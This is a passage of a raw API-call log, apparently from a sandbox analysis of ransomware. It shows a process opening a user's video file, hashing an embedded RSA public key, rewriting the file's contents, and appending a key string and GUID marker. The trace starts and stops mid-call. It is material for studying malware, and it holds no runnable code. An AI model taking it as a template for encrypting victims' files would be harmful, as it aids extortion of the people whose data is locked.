(lpFileName="C:\\Users\\kEecfMwgj\\Videos\\FPzctgqI5yS\\wICCgSS9cO9EJxpugq\\Kb5Yp2q.avi" (normalized: "c:\\users\\keecfmwgj\\videos\\fpzctgqi5ys\\wiccgss9co9ejxpugq\\kb5yp2q.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0198.664] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x2f9fb40 | out: lpFileSize=0x2f9fb40*=37503) returned 1 [0198.664] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2620000 [0198.668] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x9259, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0198.668] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x2f9fb78, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb78*=0x26, lpOverlapped=0x0) returned 1 [0198.671] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0198.671] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0198.671] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0198.671] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x2f9fb70, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb70*=0x927f, lpOverlapped=0x0) returned 1 [0198.672] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0198.672] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f1) returned 0x2a7d6f0 [0198.673] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0198.673] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0198.673] CryptAcquireContextW (in: phProv=0x2f9fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2f9fa50*=0x31b970) returned 1 [0198.674] CryptCreateHash (in: hProv=0x31b970, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2f9fa58 | out: phHash=0x2f9fa58) returned 1 [0198.674] CryptHashData (hHash=0x2a05de8, pbData=0x2a7d6f0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0198.674] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x0, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x2f9fa54) returned 1 [0198.674] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x2a26b08 [0198.674] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x2a26b08, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x2a26b08, pdwDataLen=0x2f9fa54) returned 1 [0198.675] GetLastError () returned 0x0 [0198.675] CryptDestroyHash (hHash=0x2a05de8) returned 1 [0198.675] CryptReleaseContext (hProv=0x31b970, dwFlags=0x0) returned 1 [0198.675] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0198.675] UuidCreate (in: Uuid=0x2f9fa48 | out: Uuid=0x2f9fa48) returned 0x0 [0198.675] UuidToStringA (in: Uuid=0x2f9fa48, StringUuid=0x2f9fa40 | out: StringUuid=0x2f9fa40) returned 0x0 [0198.675] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0198.675] RpcStringFreeA (in: String=0x2f9fa40 | out: String=0x2f9fa40) returned 0x0 [0198.676] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0198.676] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0198.676] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9280) returned 0x2af7168 [0198.676] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0198.677] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0198.677] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2a7d6f0 [0198.677] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0198.677] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2af3f88 [0198.677] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9f30 [0198.677] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2aead10 [0198.677] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6938 [0198.677] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2aead58 [0198.677] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6950 [0198.677] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6980 [0198.677] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae69e0 [0198.677] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6998 [0198.678] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x24) returned 0x2a06f58 [0198.678] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x158) returned 0x2aebfa0 [0198.678] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2aebfa0, Size=0x218) returned 0x2aedfa0 [0198.678] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x2af4180 [0198.678] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6980 | out: hHeap=0x2c0000) returned 1 [0198.678] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6998 | out: hHeap=0x2c0000) returned 1 [0198.678] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae69e0 | out: hHeap=0x2c0000) returned 1 [0198.678] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a06f58 | out: hHeap=0x2c0000) returned 1 [0198.679] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af4180 | out: hHeap=0x2c0000) returned 1 [0198.679] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae69e0 [0198.679] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e30 [0198.679] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6998 [0198.679] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ae8 [0198.679] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x2ae6980 [0198.679] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e50 [0198.679] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x2f5b18 [0198.679] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7a40 [0198.679] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9ed0 [0198.679] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26b08 [0198.679] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x2a19588 [0198.679] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26ac8 [0198.680] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7db0 [0198.680] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0198.680] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6998 | out: hHeap=0x2c0000) returned 1 [0198.680] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0198.680] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6980 | out: hHeap=0x2c0000) returned 1 [0198.680] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ae8 | out: hHeap=0x2c0000) returned 1 [0198.680] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0198.680] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae69e0 | out: hHeap=0x2c0000) returned 1 [0198.681] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7a40 | out: hHeap=0x2c0000) returned 1 [0198.681] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9f30 | out: hHeap=0x2c0000) returned 1 [0198.681] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aedfa0 | out: hHeap=0x2c0000) returned 1 [0198.681] GetCurrentThreadId () returned 0x5d8 [0198.681] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae00c8 [0198.681] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82) returned 0x2af5600 [0198.681] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c) returned 0x2a42548 [0198.681] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b970 [0198.681] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x148) returned 0x2ae2eb8 [0198.681] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e30 [0198.682] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e50 [0198.682] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae04e8 [0198.682] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0198.682] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0198.682] GetCurrentThreadId () returned 0x5d8 [0198.682] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0198.683] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0198.683] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xeb) returned 0x2f5b18 [0198.683] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0198.683] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0198.683] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0198.683] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0198.684] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0198.684] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae01d0 [0198.684] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0198.684] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4c) returned 0x2a40528 [0198.684] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e30 [0198.684] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2adffc0 [0198.684] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7da0 [0198.684] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae69e0 [0198.684] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0198.685] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7da0 [0198.685] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e10 [0198.685] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e20 [0198.685] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e00 [0198.685] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7dc0 [0198.685] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7de0 [0198.685] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e40 [0198.685] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6980 [0198.685] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0198.685] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e10 [0198.685] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0198.685] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7da0 [0198.685] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e70 [0198.685] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e80 [0198.686] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e60 [0198.686] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6998 [0198.686] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e80 | out: hHeap=0x2c0000) returned 1 [0198.686] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ae8 [0198.686] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e70 | out: hHeap=0x2c0000) returned 1 [0198.686] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6968 [0198.686] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e60 | out: hHeap=0x2c0000) returned 1 [0198.686] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae69f8 [0198.686] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0198.686] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7da0 [0198.686] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0198.686] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae69c8 [0198.686] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0198.687] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae69b0 [0198.687] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0198.687] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6a10 [0198.687] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae69b0 | out: hHeap=0x2c0000) returned 1 [0198.687] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae69b0 [0198.687] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae69c8 | out: hHeap=0x2c0000) returned 1 [0198.687] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e20 [0198.687] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0198.687] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26aa8 [0198.687] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0198.687] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1c) returned 0x2ad7a40 [0198.687] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6980 | out: hHeap=0x2c0000) returned 1 [0198.687] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6980 [0198.688] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0198.688] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x204) returned 0x2af4180 [0198.688] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae69e0 | out: hHeap=0x2c0000) returned 1 [0198.688] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a198d0 [0198.688] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6a10 | out: hHeap=0x2c0000) returned 1 [0198.688] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x210) returned 0x2af4390 [0198.688] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7a40 | out: hHeap=0x2c0000) returned 1 [0198.688] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10c) returned 0x2f5b18 [0198.688] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0198.688] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a197b8 [0198.688] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6980 | out: hHeap=0x2c0000) returned 1 [0198.688] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x200) returned 0x2af45a8 [0198.689] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a198d0 | out: hHeap=0x2c0000) returned 1 [0198.689] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae02d8 [0198.689] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0198.689] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b970 | out: hHeap=0x2c0000) returned 1 [0198.690] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae01d0 | out: hHeap=0x2c0000) returned 1 [0198.690] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae02d8 | out: hHeap=0x2c0000) returned 1 [0198.690] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26aa8 | out: hHeap=0x2c0000) returned 1 [0198.691] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a197b8 | out: hHeap=0x2c0000) returned 1 [0198.691] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af4390 | out: hHeap=0x2c0000) returned 1 [0198.691] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af45a8 | out: hHeap=0x2c0000) returned 1 [0198.691] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0198.691] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0198.691] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae69b0 | out: hHeap=0x2c0000) returned 1 [0198.691] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0198.692] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae69f8 | out: hHeap=0x2c0000) returned 1 [0198.692] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ae8 | out: hHeap=0x2c0000) returned 1 [0198.692] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6998 | out: hHeap=0x2c0000) returned 1 [0198.692] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6968 | out: hHeap=0x2c0000) returned 1 [0198.692] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2eb8 | out: hHeap=0x2c0000) returned 1 [0198.692] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42548 | out: hHeap=0x2c0000) returned 1 [0198.693] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae04e8 | out: hHeap=0x2c0000) returned 1 [0198.693] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6950 | out: hHeap=0x2c0000) returned 1 [0198.693] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aead58 | out: hHeap=0x2c0000) returned 1 [0198.694] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af4180 | out: hHeap=0x2c0000) returned 1 [0198.694] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adffc0 | out: hHeap=0x2c0000) returned 1 [0198.694] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40528 | out: hHeap=0x2c0000) returned 1 [0198.695] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a19588 | out: hHeap=0x2c0000) returned 1 [0198.695] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26b08 | out: hHeap=0x2c0000) returned 1 [0198.695] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0198.695] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ac8 | out: hHeap=0x2c0000) returned 1 [0198.695] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9ed0 | out: hHeap=0x2c0000) returned 1 [0198.696] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0198.696] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0198.696] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0198.697] WriteFile (in: hFile=0x584, lpBuffer=0x2af7168*, nNumberOfBytesToWrite=0x927a, lpNumberOfBytesWritten=0x2f9fb14, lpOverlapped=0x0 | out: lpBuffer=0x2af7168*, lpNumberOfBytesWritten=0x2f9fb14*=0x927a, lpOverlapped=0x0) returned 1 [0198.698] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af7168 | out: hHeap=0x2c0000) returned 1 [0198.698] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x927f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0198.698] WriteFile (in: hFile=0x584, lpBuffer=0x2ae00c8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ae00c8*, lpNumberOfBytesWritten=0x2f9fb50*=0x100, lpOverlapped=0x0) returned 1 [0198.698] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae00c8 | out: hHeap=0x2c0000) returned 1 [0198.698] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2efb0 [0198.699] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x428) returned 0x2af3f88 [0198.699] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2af3f88, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0198.699] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x430) returned 0x2af43b8 [0198.699] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0198.699] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2efb0 | out: hHeap=0x2c0000) returned 1 [0198.699] WriteFile (in: hFile=0x584, lpBuffer=0x2af43b8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2af43b8*, lpNumberOfBytesWritten=0x2f9fb50*=0x28, lpOverlapped=0x0) returned 1 [0198.700] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af43b8 | out: hHeap=0x2c0000) returned 1 [0198.700] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0198.700] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, 